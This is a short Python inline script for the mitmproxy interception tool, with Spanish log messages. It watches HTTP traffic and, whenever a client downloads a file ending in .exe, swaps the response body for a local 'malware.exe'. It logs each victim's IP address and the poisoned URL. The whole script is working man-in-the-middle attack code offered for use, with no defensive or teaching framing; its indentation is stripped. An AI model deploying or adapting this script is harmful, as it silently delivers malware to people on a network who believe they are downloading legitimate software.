# -*- coding: utf-8 -*-
#
import tempfile
import sys, os
import re
import time
trojan = 'malware.exe'
yettrojaned = []
f = open('logpwned', 'a', 0)
def response(context, flow):
urlrequest = flow.request.get_url()
ip= flow.request.client_conn.address[0]
pattern = urlrequest+":"+ip
if pattern in yettrojaned :
f.write("%s Tenemos un cliente\n " % time.asctime(time.localtime()))
f.write("la URL solicitada %s ya ha sido envenenada\n" % urlrequest)
if flow.request.get_url().endswith('.exe') and pattern not in yettrojaned :
f.write("%s Tenemos un cliente\n" % time.asctime(time.localtime()))
ip= flow.request.client_conn.address[0]
f.write("IP de la victima %s\n" % ip)
f.write("URL solicitada %s\n" % urlrequest)
yettrojaned.append(urlrequest+":"+ip)
flow.response.content = open('%s' % trojan, 'rb').read()